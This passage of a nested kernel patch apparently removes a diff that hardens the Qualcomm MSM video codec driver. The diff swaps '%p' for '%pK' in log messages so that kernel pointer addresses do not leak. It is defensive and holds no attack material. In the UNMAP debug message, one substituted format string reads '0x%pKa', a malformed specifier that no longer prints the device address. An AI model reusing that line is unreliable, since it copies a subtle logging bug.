-@@ -1562,7 +1562,7 @@ int msm_vdec_querycap(struct msm_vidc_inst *inst, struct v4l2_capability *cap)
- {
- 	if (!inst || !cap) {
- 		dprintk(VIDC_ERR,
--			"Invalid input, inst = %p, cap = %p\n", inst, cap);
-+			"Invalid input, inst = %pK, cap = %pK\n", inst, cap);
- 		return -EINVAL;
- 	}
- 	strlcpy(cap->driver, MSM_VIDC_DRV_NAME, sizeof(cap->driver));
-@@ -1582,7 +1582,7 @@ int msm_vdec_enum_fmt(struct msm_vidc_inst *inst, struct v4l2_fmtdesc *f)
- 	int rc = 0;
- 	if (!inst || !f) {
- 		dprintk(VIDC_ERR,
--			"Invalid input, inst = %p, f = %p\n", inst, f);
-+			"Invalid input, inst = %pK, f = %pK\n", inst, f);
- 		return -EINVAL;
- 	}
- 	if (f->type == V4L2_BUF_TYPE_VIDEO_CAPTURE_MPLANE) {
-@@ -1640,7 +1640,7 @@ static int msm_vdec_queue_setup(struct vb2_queue *q,
- 
- 	if (!q || !num_buffers || !num_planes
- 		|| !sizes || !q->drv_priv) {
--		dprintk(VIDC_ERR, "Invalid input, q = %p, %p, %p\n",
-+		dprintk(VIDC_ERR, "Invalid input, q = %pK, %pK, %pK\n",
- 			q, num_buffers, num_planes);
- 		return -EINVAL;
- 	}
-@@ -1829,7 +1829,7 @@ static inline int start_streaming(struct msm_vidc_inst *inst)
- 	rc = msm_comm_try_state(inst, MSM_VIDC_START_DONE);
- 	if (rc) {
- 		dprintk(VIDC_ERR,
--			"Failed to move inst: %p to start done state\n", inst);
-+			"Failed to move inst: %pK to start done state\n", inst);
- 		goto fail_start;
- 	}
- 	msm_dcvs_init_load(inst);
-@@ -1866,7 +1866,7 @@ static inline int stop_streaming(struct msm_vidc_inst *inst)
- 	rc = msm_comm_try_state(inst, MSM_VIDC_RELEASE_RESOURCES_DONE);
- 	if (rc)
- 		dprintk(VIDC_ERR,
--			"Failed to move inst: %p to start done state\n", inst);
-+			"Failed to move inst: %pK to start done state\n", inst);
- 	return rc;
- }
- 
-@@ -1876,7 +1876,7 @@ static int msm_vdec_start_streaming(struct vb2_queue *q, unsigned int count)
- 	int rc = 0;
- 	struct hfi_device *hdev;
- 	if (!q || !q->drv_priv) {
--		dprintk(VIDC_ERR, "Invalid input, q = %p\n", q);
-+		dprintk(VIDC_ERR, "Invalid input, q = %pK\n", q);
- 		return -EINVAL;
- 	}
- 	inst = q->drv_priv;
-@@ -1909,7 +1909,7 @@ static int msm_vdec_stop_streaming(struct vb2_queue *q)
- 	struct msm_vidc_inst *inst;
- 	int rc = 0;
- 	if (!q || !q->drv_priv) {
--		dprintk(VIDC_ERR, "Invalid input, q = %p\n", q);
-+		dprintk(VIDC_ERR, "Invalid input, q = %pK\n", q);
- 		return -EINVAL;
- 	}
- 	inst = q->drv_priv;
-@@ -1934,7 +1934,7 @@ static int msm_vdec_stop_streaming(struct vb2_queue *q)
- 
- 	if (rc)
- 		dprintk(VIDC_ERR,
--			"Failed to move inst: %p, cap = %d to state: %d\n",
-+			"Failed to move inst: %pK, cap = %d to state: %d\n",
- 			inst, q->type, MSM_VIDC_RELEASE_RESOURCES_DONE);
- 	return rc;
- }
-@@ -1992,7 +1992,7 @@ int msm_vdec_cmd(struct msm_vidc_inst *inst, struct v4l2_decoder_cmd *dec)
- 		if (inst->state == MSM_VIDC_CORE_INVALID ||
- 			core->state == VIDC_CORE_INVALID) {
- 			dprintk(VIDC_ERR,
--				"Core %p in bad state, Sending CLOSE event\n",
-+				"Core %pK in bad state, Sending CLOSE event\n",
- 					core);
- 			msm_vidc_queue_v4l2_event(inst,
- 					V4L2_EVENT_MSM_VIDC_CLOSE_DONE);
-@@ -2034,7 +2034,7 @@ int msm_vdec_inst_init(struct msm_vidc_inst *inst)
- {
- 	int rc = 0;
- 	if (!inst) {
--		dprintk(VIDC_ERR, "Invalid input = %p\n", inst);
-+		dprintk(VIDC_ERR, "Invalid input = %pK\n", inst);
- 		return -EINVAL;
- 	}
- 	inst->fmts[OUTPUT_PORT] = &vdec_formats[1];
-@@ -2575,7 +2575,7 @@ static int try_set_ctrl(struct msm_vidc_inst *inst, struct v4l2_ctrl *ctrl)
- 	case V4L2_CID_MPEG_VIDC_VIDEO_OPERATING_RATE:
- 		property_id = 0;
- 		inst->operating_rate = ctrl->val;
--		dprintk(VIDC_DBG, "inst(%p) operating rate changed to %d",
-+		dprintk(VIDC_DBG, "inst(%pK) operating rate changed to %d",
- 			inst, inst->operating_rate >> 16);
- 		msm_comm_scale_clocks_and_bus(inst);
- 		break;
-@@ -2607,7 +2607,7 @@ static int msm_vdec_op_s_ctrl(struct v4l2_ctrl *ctrl)
- 	rc = msm_comm_try_state(inst, MSM_VIDC_OPEN_DONE);
- 	if (rc) {
- 		dprintk(VIDC_ERR,
--			"Failed to move inst: %p to start done state\n", inst);
-+			"Failed to move inst: %pK to start done state\n", inst);
- 		goto failed_open_done;
- 	}
- 
-@@ -2639,7 +2639,7 @@ static int msm_vdec_op_g_volatile_ctrl(struct v4l2_ctrl *ctrl)
- 	rc = msm_comm_try_state(inst, MSM_VIDC_OPEN_DONE);
- 	if (rc) {
- 		dprintk(VIDC_ERR,
--			"Failed to move inst: %p to start done state\n", inst);
-+			"Failed to move inst: %pK to start done state\n", inst);
- 		goto failed_open_done;
- 	}
- 	for (c = 0; c < master->ncontrols; ++c) {
-diff --git a/drivers/media/platform/msm/vidc/msm_venc.c b/drivers/media/platform/msm/vidc/msm_venc.c
-index 932c980..d3f176d 100644
---- a/drivers/media/platform/msm/vidc/msm_venc.c
-+++ b/drivers/media/platform/msm/vidc/msm_venc.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -1520,7 +1520,7 @@ static inline int start_streaming(struct msm_vidc_inst *inst)
- 	rc = msm_comm_try_state(inst, MSM_VIDC_START_DONE);
- 	if (rc) {
- 		dprintk(VIDC_ERR,
--			"Failed to move inst: %p to start done state\n", inst);
-+			"Failed to move inst: %pK to start done state\n", inst);
- 		goto fail_start;
- 	}
- 	msm_dcvs_init_load(inst);
-@@ -1547,7 +1547,7 @@ static int msm_venc_start_streaming(struct vb2_queue *q, unsigned int count)
- 	struct msm_vidc_inst *inst;
- 	int rc = 0;
- 	if (!q || !q->drv_priv) {
--		dprintk(VIDC_ERR, "Invalid input, q = %p\n", q);
-+		dprintk(VIDC_ERR, "Invalid input, q = %pK\n", q);
- 		return -EINVAL;
- 	}
- 	inst = q->drv_priv;
-@@ -1574,7 +1574,7 @@ static int msm_venc_stop_streaming(struct vb2_queue *q)
- 	struct msm_vidc_inst *inst;
- 	int rc = 0;
- 	if (!q || !q->drv_priv) {
--		dprintk(VIDC_ERR, "Invalid input, q = %p\n", q);
-+		dprintk(VIDC_ERR, "Invalid input, q = %pK\n", q);
- 		return -EINVAL;
- 	}
- 	inst = q->drv_priv;
-@@ -1595,7 +1595,7 @@ static int msm_venc_stop_streaming(struct vb2_queue *q)
- 
- 	if (rc)
- 		dprintk(VIDC_ERR,
--			"Failed to move inst: %p, cap = %d to state: %d\n",
-+			"Failed to move inst: %pK, cap = %d to state: %d\n",
- 			inst, q->type, MSM_VIDC_CLOSE_DONE);
- 	return rc;
- }
-@@ -2835,7 +2835,7 @@ static int try_set_ctrl(struct msm_vidc_inst *inst, struct v4l2_ctrl *ctrl)
- 	case V4L2_CID_MPEG_VIDC_VIDEO_OPERATING_RATE:
- 		property_id = 0;
- 		inst->operating_rate = ctrl->val;
--		dprintk(VIDC_DBG, "inst(%p) operating rate changed to %d",
-+		dprintk(VIDC_DBG, "inst(%pK) operating rate changed to %d",
- 			inst, inst->operating_rate >> 16);
- 		msm_comm_scale_clocks_and_bus(inst);
-                 break;
-@@ -3054,7 +3054,7 @@ static int msm_venc_op_s_ctrl(struct v4l2_ctrl *ctrl)
- 
- 	if (rc) {
- 		dprintk(VIDC_ERR,
--			"Failed to move inst: %p to start done state\n", inst);
-+			"Failed to move inst: %pK to start done state\n", inst);
- 		goto failed_open_done;
- 	}
- 
-@@ -3098,7 +3098,7 @@ int msm_venc_inst_init(struct msm_vidc_inst *inst)
- {
- 	int rc = 0;
- 	if (!inst) {
--		dprintk(VIDC_ERR, "Invalid input = %p\n", inst);
-+		dprintk(VIDC_ERR, "Invalid input = %pK\n", inst);
- 		return -EINVAL;
- 	}
- 	inst->fmts[CAPTURE_PORT] = &venc_formats[1];
-@@ -3181,7 +3181,7 @@ int msm_venc_querycap(struct msm_vidc_inst *inst, struct v4l2_capability *cap)
- {
- 	if (!inst || !cap) {
- 		dprintk(VIDC_ERR,
--			"Invalid input, inst = %p, cap = %p\n", inst, cap);
-+			"Invalid input, inst = %pK, cap = %pK\n", inst, cap);
- 		return -EINVAL;
- 	}
- 	strlcpy(cap->driver, MSM_VIDC_DRV_NAME, sizeof(cap->driver));
-@@ -3201,7 +3201,7 @@ int msm_venc_enum_fmt(struct msm_vidc_inst *inst, struct v4l2_fmtdesc *f)
- 	int rc = 0;
- 	if (!inst || !f) {
- 		dprintk(VIDC_ERR,
--			"Invalid input, inst = %p, f = %p\n", inst, f);
-+			"Invalid input, inst = %pK, f = %pK\n", inst, f);
- 		return -EINVAL;
- 	}
- 	if (f->type == V4L2_BUF_TYPE_VIDEO_CAPTURE_MPLANE) {
-@@ -3275,7 +3275,7 @@ int msm_venc_s_parm(struct msm_vidc_inst *inst, struct v4l2_streamparm *a)
- 		fps = fps - 1;
- 
- 	if (inst->prop.fps != fps) {
--		dprintk(VIDC_PROF, "reported fps changed for %p: %d->%d\n",
-+		dprintk(VIDC_PROF, "reported fps changed for %pK: %d->%d\n",
- 				inst, inst->prop.fps, fps);
- 		inst->prop.fps = fps;
- 		frame_rate.frame_rate = inst->prop.fps * (0x1<<16);
-@@ -3329,7 +3329,7 @@ int msm_venc_s_fmt(struct msm_vidc_inst *inst, struct v4l2_format *f)
- 	struct hfi_device *hdev;
- 	if (!inst || !f) {
- 		dprintk(VIDC_ERR,
--			"Invalid input, inst = %p, format = %p\n", inst, f);
-+			"Invalid input, inst = %pK, format = %pK\n", inst, f);
- 		return -EINVAL;
- 	}
- 
-@@ -3512,7 +3512,7 @@ int msm_venc_g_fmt(struct msm_vidc_inst *inst, struct v4l2_format *f)
- 
- 	if (!inst || !f) {
- 		dprintk(VIDC_ERR,
--			"Invalid input, inst = %p, format = %p\n", inst, f);
-+			"Invalid input, inst = %pK, format = %pK\n", inst, f);
- 		return -EINVAL;
- 	}
- 
-@@ -3577,7 +3577,7 @@ int msm_venc_reqbufs(struct msm_vidc_inst *inst, struct v4l2_requestbuffers *b)
- 	int rc = 0;
- 	if (!inst || !b) {
- 		dprintk(VIDC_ERR,
--			"Invalid input, inst = %p, buffer = %p\n", inst, b);
-+			"Invalid input, inst = %pK, buffer = %pK\n", inst, b);
- 		return -EINVAL;
- 	}
- 	q = msm_comm_get_vb2q(inst, b->type);
-@@ -3614,7 +3614,7 @@ int msm_venc_prepare_buf(struct msm_vidc_inst *inst,
- 	if (inst->state == MSM_VIDC_CORE_INVALID ||
- 			inst->core->state == VIDC_CORE_INVALID) {
- 		dprintk(VIDC_ERR,
--			"Core %p in bad state, ignoring prepare buf\n",
-+			"Core %pK in bad state, ignoring prepare buf\n",
- 				inst->core);
- 		goto exit;
- 	}
-@@ -3685,7 +3685,7 @@ int msm_venc_release_buf(struct msm_vidc_inst *inst,
- 	rc = msm_comm_try_state(inst, MSM_VIDC_RELEASE_RESOURCES_DONE);
- 	if (rc) {
- 		dprintk(VIDC_ERR,
--			"Failed to move inst: %p to release res done state\n",
-+			"Failed to move inst: %pK to release res done state\n",
- 			inst);
- 		goto exit;
- 	}
-diff --git a/drivers/media/platform/msm/vidc/msm_vidc.c b/drivers/media/platform/msm/vidc/msm_vidc.c
-index 38ccaa3..8f4b6b6 100644
---- a/drivers/media/platform/msm/vidc/msm_vidc.c
-+++ b/drivers/media/platform/msm/vidc/msm_vidc.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -331,7 +331,7 @@ struct buffer_info *device_to_uvaddr(struct msm_vidc_list *buf_list,
- 
- 	if (!buf_list || !device_addr) {
- 		dprintk(VIDC_ERR,
--			"Invalid input- device_addr: 0x%pa buf_list: %p\n",
-+			"Invalid input- device_addr: 0x%pa buf_list: %pK\n",
- 			&device_addr, buf_list);
- 		goto err_invalid_input;
- 	}
-@@ -487,7 +487,7 @@ int map_and_register_buf(struct msm_vidc_inst *inst, struct v4l2_buffer *b)
- 		goto exit;
- 	}
- 
--	dprintk(VIDC_DBG, "[MAP] Create binfo = %p fd = %d type = %d\n",
-+	dprintk(VIDC_DBG, "[MAP] Create binfo = %pK fd = %d type = %d\n",
- 			binfo, b->m.planes[0].reserved[0], b->type);
- 
- 	for (i = 0; i < b->length; ++i) {
-@@ -570,7 +570,7 @@ int map_and_register_buf(struct msm_vidc_inst *inst, struct v4l2_buffer *b)
- 				goto exit;
- 		}
- 		dprintk(VIDC_DBG,
--			"%s: [MAP] binfo = %p, handle[%d] = %p, device_addr = 0x%pa, fd = %d, offset = %d, mapped = %d\n",
-+			"%s: [MAP] binfo = %pK, handle[%d] = %pK, device_addr = 0x%pa, fd = %d, offset = %d, mapped = %d\n",
- 			__func__, binfo, i, binfo->handle[i],
- 			&binfo->device_addr[i], binfo->fd[i],
- 			binfo->buff_off[i], binfo->mapped[i]);
-@@ -593,7 +593,7 @@ int unmap_and_deregister_buf(struct msm_vidc_inst *inst,
- 	bool found = false, keep_node = false;
- 
- 	if (!inst || !binfo) {
--		dprintk(VIDC_ERR, "%s invalid param: %p %p\n",
-+		dprintk(VIDC_ERR, "%s invalid param: %pK %pK\n",
- 			__func__, inst, binfo);
- 		return -EINVAL;
- 	}
-@@ -623,7 +623,7 @@ int unmap_and_deregister_buf(struct msm_vidc_inst *inst,
- 
- 	for (i = 0; i < temp->num_planes; i++) {
- 		dprintk(VIDC_DBG,
--			"%s: [UNMAP] binfo = %p, handle[%d] = %p, device_addr = 0x%pa, fd = %d, offset = %d, mapped = %d\n",
-+			"%s: [UNMAP] binfo = %pK, handle[%d] = %pK, device_addr = 0x%pKa, fd = %d, offset = %d, mapped = %d\n",
- 			__func__, temp, i, temp->handle[i],
- 			&temp->device_addr[i], temp->fd[i],
- 			temp->buff_off[i], temp->mapped[i]);
-@@ -652,12 +652,12 @@ int unmap_and_deregister_buf(struct msm_vidc_inst *inst,
- 		}
- 	}
- 	if (!keep_node) {
--		dprintk(VIDC_DBG, "[UNMAP] AND-FREED binfo: %p\n", temp);
-+		dprintk(VIDC_DBG, "[UNMAP] AND-FREED binfo: %pK\n", temp);
- 		list_del(&temp->list);
- 		kfree(temp);
- 	} else {
- 		temp->inactive = true;
--		dprintk(VIDC_DBG, "[UNMAP] NOT-FREED binfo: %p\n", temp);
-+		dprintk(VIDC_DBG, "[UNMAP] NOT-FREED binfo: %pK\n", temp);
- 	}
- exit:
- 	return 0;
-@@ -671,7 +671,7 @@ int qbuf_dynamic_buf(struct msm_vidc_inst *inst,
- 	struct v4l2_plane plane[VIDEO_MAX_PLANES] = { {0} };
- 
- 	if (!binfo) {
--		dprintk(VIDC_ERR, "%s invalid param: %p\n", __func__, binfo);
-+		dprintk(VIDC_ERR, "%s invalid param: %pK\n", __func__, binfo);
- 		return -EINVAL;
- 	}
- 	dprintk(VIDC_DBG, "%s fd[0] = %d\n", __func__, binfo->fd[0]);
-@@ -694,7 +694,7 @@ int output_buffer_cache_invalidate(struct msm_vidc_inst *inst,
- 	int rc = 0;
- 
- 	if (!inst) {
--		dprintk(VIDC_ERR, "%s: invalid inst: %p\n", __func__, inst);
-+		dprintk(VIDC_ERR, "%s: invalid inst: %pK\n", __func__, inst);
- 		return -EINVAL;
- 	}
- 
-@@ -702,7 +702,7 @@ int output_buffer_cache_invalidate(struct msm_vidc_inst *inst,
- 		return 0;
- 
- 	if (!binfo) {
--		dprintk(VIDC_ERR, "%s: invalid buffer info: %p\n",
-+		dprintk(VIDC_ERR, "%s: invalid buffer info: %pK\n",
- 			__func__, inst);
- 		return -EINVAL;
- 	}
-@@ -780,7 +780,7 @@ int msm_vidc_release_buffers(void *instance, int buffer_type)
- 		rc = msm_comm_try_state(inst, MSM_VIDC_RELEASE_RESOURCES_DONE);
- 		if (rc) {
- 			dprintk(VIDC_ERR,
--					"Failed to move inst: %p to release res done\n",
-+					"Failed to move inst: %pK to release res done\n",
- 					inst);
- 		}
- 	}
-@@ -862,7 +862,7 @@ int msm_vidc_free_buffers(void *instance, int buffer_type)
- 			for (i = 0; i < bi->num_planes; i++) {
- 				if (bi->handle[i] && bi->mapped[i]) {
- 					dprintk(VIDC_DBG,
--						"%s: binfo = 0x%p, handle[%d] = %p, device_addr = %pa, fd = %d, offset = %d, buffer_type 0x%x, mapped = %d\n",
-+						"%s: binfo = 0x%pK, handle[%d] = %pK, device_addr = %pa, fd = %d, offset = %d, buffer_type 0x%x, mapped = %d\n",
- 						__func__, bi, i, bi->handle[i],
- 						&bi->device_addr[i], bi->fd[i],
- 						bi->buff_off[i], bi->type,
-@@ -1089,7 +1089,7 @@ int msm_vidc_enum_framesizes(void *instance, struct v4l2_frmsizeenum *fsize)
- 	struct msm_vidc_capability *capability = NULL;
- 
- 	if (!inst || !fsize) {
--		dprintk(VIDC_ERR, "%s: invalid parameter: %p %p\n",
-+		dprintk(VIDC_ERR, "%s: invalid parameter: %pK %pK\n",
- 				__func__, inst, fsize);
- 		return -EINVAL;
- 	}
-@@ -1156,7 +1156,7 @@ void *msm_vidc_smem_get_client(void *instance)
- 	struct msm_vidc_inst *inst = instance;
- 
- 	if (!inst || !inst->mem_client) {
--		dprintk(VIDC_ERR, "%s: invalid instance or client = %p\n",
-+		dprintk(VIDC_ERR, "%s: invalid instance or client = %pK\n",
- 				__func__, inst);
- 		return NULL;
- 	}
-@@ -1214,7 +1214,7 @@ static int setup_event_queue(void *inst,
- 	struct msm_vidc_inst *vidc_inst = (struct msm_vidc_inst *)inst;
- 
- 	if (!inst || !pvdev) {
--		dprintk(VIDC_ERR, "%s Invalid params inst %p pvdev %p\n",
-+		dprintk(VIDC_ERR, "%s Invalid params inst %pK pvdev %pK\n",
- 					__func__, inst, pvdev);
- 		return -EINVAL;
- 	}
-@@ -1290,7 +1290,7 @@ void *msm_vidc_open(int core_id, int session_type)
- 		goto err_invalid_core;
- 	}
- 
--	pr_info(VIDC_DBG_TAG "Opening video instance: %p, %d\n",
-+	pr_info(VIDC_DBG_TAG "Opening video instance: %pK, %d\n",
- 		VIDC_MSG_PRIO2STRING(VIDC_INFO), inst, session_type);
- 	mutex_init(&inst->sync_lock);
- 	mutex_init(&inst->bufq[CAPTURE_PORT].lock);
-@@ -1493,7 +1493,7 @@ int msm_vidc_close(void *instance)
- 
- 	msm_smem_delete_client(inst->mem_client);
- 
--	pr_info(VIDC_DBG_TAG "Closed video instance: %p\n",
-+	pr_info(VIDC_DBG_TAG "Closed video instance: %pK\n",
- 			VIDC_MSG_PRIO2STRING(VIDC_INFO), inst);
- 	kfree(inst);
- 
-diff --git a/drivers/media/platform/msm/vidc/msm_vidc_common.c b/drivers/media/platform/msm/vidc/msm_vidc_common.c
-index f001290..48192b3 100644
---- a/drivers/media/platform/msm/vidc/msm_vidc_common.c
-+++ b/drivers/media/platform/msm/vidc/msm_vidc_common.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -159,7 +159,7 @@ int msm_comm_get_inst_load(struct msm_vidc_inst *inst,
- 	if (!is_thumbnail_session(inst) && !is_realtime_session(inst) &&
- 		(quirks & LOAD_CALC_IGNORE_NON_REALTIME_LOAD)) {
- 		if (!inst->prop.fps) {
--			dprintk(VIDC_INFO, "%s: instance:%p prop->fps is set 0\n", __func__, inst);
-+			dprintk(VIDC_INFO, "%s: instance:%pK prop->fps is set 0\n", __func__, inst);
- 			load = 0;
- 		} else {
- 			load = msm_comm_get_mbs_per_sec(inst) / inst->prop.fps;
-@@ -167,7 +167,7 @@ int msm_comm_get_inst_load(struct msm_vidc_inst *inst,
- 	}
- 
- 	dprintk(VIDC_DBG,
--		"inst[%p]: load %d, wxh %dx%d, fps %d, operating_rate %d, flags 0x%x, quirks 0x%x\n",
-+		"inst[%pK]: load %d, wxh %dx%d, fps %d, operating_rate %d, flags 0x%x, quirks 0x%x\n",
- 		inst, load, inst->prop.width[OUTPUT_PORT],
- 		inst->prop.height[OUTPUT_PORT], inst->prop.fps,
- 		inst->operating_rate >> 16, inst->flags, quirks);
-@@ -182,7 +182,7 @@ int msm_comm_get_load(struct msm_vidc_core *core,
- 	int num_mbs_per_sec = 0;
- 
- 	if (!core) {
--		dprintk(VIDC_ERR, "Invalid args: %p\n", core);
-+		dprintk(VIDC_ERR, "Invalid args: %pK\n", core);
- 		return -EINVAL;
- 	}
- 
-@@ -280,13 +280,13 @@ static int msm_comm_vote_bus(struct msm_vidc_core *core)
- 	struct vidc_bus_vote_data *vote_data = NULL;
- 
- 	if (!core) {
--		dprintk(VIDC_ERR, "%s Invalid args: %p\n", __func__, core);
-+		dprintk(VIDC_ERR, "%s Invalid args: %pK\n", __func__, core);
- 		return -EINVAL;
- 	}
- 
- 	hdev = core->device;
- 	if (!hdev) {
--		dprintk(VIDC_ERR, "%s Invalid device handle: %p\n",
-+		dprintk(VIDC_ERR, "%s Invalid device handle: %pK\n",
- 			__func__, hdev);
- 		return -EINVAL;
- 	}
-@@ -387,7 +387,7 @@ const struct msm_vidc_format *msm_comm_get_pixel_fmt_index(
- {
- 	int i, k = 0;
- 	if (!fmt || index < 0) {
--		dprintk(VIDC_ERR, "Invalid inputs, fmt = %p, index = %d\n",
-+		dprintk(VIDC_ERR, "Invalid inputs, fmt = %pK, index = %d\n",
- 						fmt, index);
- 		return NULL;
- 	}
-@@ -409,7 +409,7 @@ struct msm_vidc_format *msm_comm_get_pixel_fmt_fourcc(
- {
- 	int i;
- 	if (!fmt) {
--		dprintk(VIDC_ERR, "Invalid inputs, fmt = %p\n", fmt);
-+		dprintk(VIDC_ERR, "Invalid inputs, fmt = %pK\n", fmt);
- 		return NULL;
- 	}
- 	for (i = 0; i < size; i++) {
-@@ -572,11 +572,11 @@ static void change_inst_state(struct msm_vidc_inst *inst,
- 	mutex_lock(&inst->lock);
- 	if (inst->state == MSM_VIDC_CORE_INVALID) {
- 		dprintk(VIDC_DBG,
--			"Inst: %p is in bad state can't change state to %d\n",
-+			"Inst: %pK is in bad state can't change state to %d\n",
- 			inst, state);
- 		goto exit;
- 	}
--	dprintk(VIDC_DBG, "Moved inst: %p from state: %d to state: %d\n",
-+	dprintk(VIDC_DBG, "Moved inst: %pK from state: %d to state: %d\n",
- 		   inst, inst->state, state);
- 	inst->state = state;
- exit:
-@@ -587,7 +587,7 @@ static int signal_session_msg_receipt(enum command_response cmd,
- 		struct msm_vidc_inst *inst)
- {
- 	if (!inst) {
--		dprintk(VIDC_ERR, "Invalid(%p) instance id\n", inst);
-+		dprintk(VIDC_ERR, "Invalid(%pK) instance id\n", inst);
- 		return -EINVAL;
- 	}
- 	if (IS_SESSION_CMD_VALID(cmd)) {
-@@ -628,7 +628,7 @@ static int wait_for_state(struct msm_vidc_inst *inst,
- {
- 	int rc = 0;
- 	if (IS_ALREADY_IN_STATE(flipped_state, desired_state)) {
--		dprintk(VIDC_INFO, "inst: %p is already in state: %d\n",
-+		dprintk(VIDC_INFO, "inst: %pK is already in state: %d\n",
- 						inst, inst->state);
- 		goto err_same_state;
- 	}
-@@ -689,7 +689,7 @@ static void handle_session_init_done(enum command_response cmd, void *data)
- 	inst = response->session_id;
- 	if (!inst || !inst->core || !inst->core->device) {
- 		dprintk(VIDC_ERR,
--			"%s: invalid parameters, inst %p\n", __func__, inst);
-+			"%s: invalid parameters, inst %pK\n", __func__, inst);
- 		return;
- 	}
- 	core = inst->core;
-@@ -813,7 +813,7 @@ static void handle_event_change(enum command_response cmd, void *data)
- 		struct buffer_info *binfo = NULL, *temp = NULL;
- 		u32 *ptr = NULL;
- 
--		dprintk(VIDC_DBG, "%s - inst: %p buffer: 0x%pa extra: 0x%pa\n",
-+		dprintk(VIDC_DBG, "%s - inst: %pK buffer: 0x%pa extra: 0x%pa\n",
- 				__func__, inst, &event_notify->packet_buffer,
- 				&event_notify->extra_data_buffer);
- 
-@@ -1149,7 +1149,7 @@ static void handle_sys_idle(enum command_response cmd, void *data)
- 		goto exit;
- 	}
- 
--	dprintk(VIDC_DBG, "SYS_IDLE received for core %p\n", core);
-+	dprintk(VIDC_DBG, "SYS_IDLE received for core %pK\n", core);
- 	if (core->resources.dynamic_bw_update) {
- 		mutex_lock(&core->lock);
- 		core->idle_stats.start_time = ktime_get();
-@@ -1182,23 +1182,23 @@ static void handle_session_error(enum command_response cmd, void *data)
- 
- 	if (!inst || !inst->session || !inst->core->device) {
- 		dprintk(VIDC_ERR,
--				"Session (%p) not in a stable enough state to handle session error\n",
-+				"Session (%pK) not in a stable enough state to handle session error\n",
- 				inst);
- 		return;
- 	}
- 
- 	hdev = inst->core->device;
--	dprintk(VIDC_WARN, "Session error received for session %p\n", inst);
-+	dprintk(VIDC_WARN, "Session error received for session %pK\n", inst);
- 	change_inst_state(inst, MSM_VIDC_CORE_INVALID);
- 
- 	if (response->status == VIDC_ERR_MAX_CLIENTS) {
--		dprintk(VIDC_WARN, "Too many clients, rejecting %p", inst);
-+		dprintk(VIDC_WARN, "Too many clients, rejecting %pK", inst);
- 		event = V4L2_EVENT_MSM_VIDC_MAX_CLIENTS;
- 	} else if (response->status == VIDC_ERR_NOT_SUPPORTED) {
--		dprintk(VIDC_WARN, "Unsupported error for %p", inst);
-+		dprintk(VIDC_WARN, "Unsupported error for %pK", inst);
- 		event = V4L2_EVENT_MSM_VIDC_HW_UNSUPPORTED;
- 	} else {
--		dprintk(VIDC_WARN, "Unknown session error (%d) for %p\n",
-+		dprintk(VIDC_WARN, "Unknown session error (%d) for %pK\n",
- 				response->status, inst);
- 		event = V4L2_EVENT_MSM_VIDC_SYS_ERROR;
- 	}
-@@ -1213,7 +1213,7 @@ static void msm_comm_clean_notify_client(struct msm_vidc_core *core)
- 		return;
- 	}
- 
--	dprintk(VIDC_WARN, "%s: Core %p\n", __func__, core);
-+	dprintk(VIDC_WARN, "%s: Core %pK\n", __func__, core);
- 	mutex_lock(&core->lock);
- 	core->state = VIDC_CORE_INVALID;
- 
-@@ -1222,7 +1222,7 @@ static void msm_comm_clean_notify_client(struct msm_vidc_core *core)
- 		inst->state = MSM_VIDC_CORE_INVALID;
- 		mutex_unlock(&inst->lock);
- 		dprintk(VIDC_WARN,
--			"%s Send sys error for inst %p\n", __func__, inst);
-+			"%s Send sys error for inst %pK\n", __func__, inst);
- 		msm_vidc_queue_v4l2_event(inst,
- 				V4L2_EVENT_MSM_VIDC_SYS_ERROR);
- 	}
-@@ -1255,7 +1255,7 @@ static void handle_sys_error(enum command_response cmd, void *data)
- 		return;
- 	}
- 
--	dprintk(VIDC_WARN, "SYS_ERROR %d received for core %p\n", cmd, core);
-+	dprintk(VIDC_WARN, "SYS_ERROR %d received for core %pK\n", cmd, core);
- 	msm_comm_clean_notify_client(core);
- 	hdev = core->device;
- 	mutex_lock(&core->lock);
-@@ -1290,12 +1290,12 @@ void msm_comm_session_clean(struct msm_vidc_inst *inst)
- 
- 	hdev = inst->core->device;
- 	if (hdev && inst->session) {
--		dprintk(VIDC_DBG, "cleaning up instance: 0x%p\n", inst);
-+		dprintk(VIDC_DBG, "cleaning up instance: 0x%pK\n", inst);
- 		rc = call_hfi_op(hdev, session_clean,
- 				(void *) inst->session);
- 		if (rc) {
- 			dprintk(VIDC_ERR,
--				"Session clean failed :%p\n", inst);
-+				"Session clean failed :%pK\n", inst);
- 		}
- 		inst->session = NULL;
- 	}
-@@ -1696,7 +1696,7 @@ static void handle_fbd(enum command_response cmd, void *data)
- 
- 		if (extra_idx && (extra_idx < VIDEO_MAX_PLANES)) {
- 			dprintk(VIDC_DBG,
--				"extradata: userptr = %p;"
-+				"extradata: userptr = %pK;"
- 				" bytesused = %d; length = %d\n",
- 				(u8 *)vb->v4l2_planes[extra_idx].m.userptr,
- 				vb->v4l2_planes[extra_idx].bytesused,
-@@ -1838,13 +1838,13 @@ int msm_comm_scale_clocks_load(struct msm_vidc_core *core, int num_mbs_per_sec)
- 	int codec = 0;
- 
- 	if (!core) {
--		dprintk(VIDC_ERR, "%s Invalid args: %p\n", __func__, core);
-+		dprintk(VIDC_ERR, "%s Invalid args: %pK\n", __func__, core);
- 		return -EINVAL;
- 	}
- 
- 	hdev = core->device;
- 	if (!hdev) {
--		dprintk(VIDC_ERR, "%s Invalid device handle: %p\n",
-+		dprintk(VIDC_ERR, "%s Invalid device handle: %pK\n",
- 			__func__, hdev);
- 		return -EINVAL;
- 	}
-@@ -1996,7 +1996,7 @@ static int msm_comm_session_abort(struct msm_vidc_inst *inst)
- 			msecs_to_jiffies(msm_vidc_hw_rsp_timeout));
- 	if (!rc) {
- 		dprintk(VIDC_ERR,
--				"%s: Wait interrupted or timed out [%p]: %d\n",
-+				"%s: Wait interrupted or timed out [%pK]: %d\n",
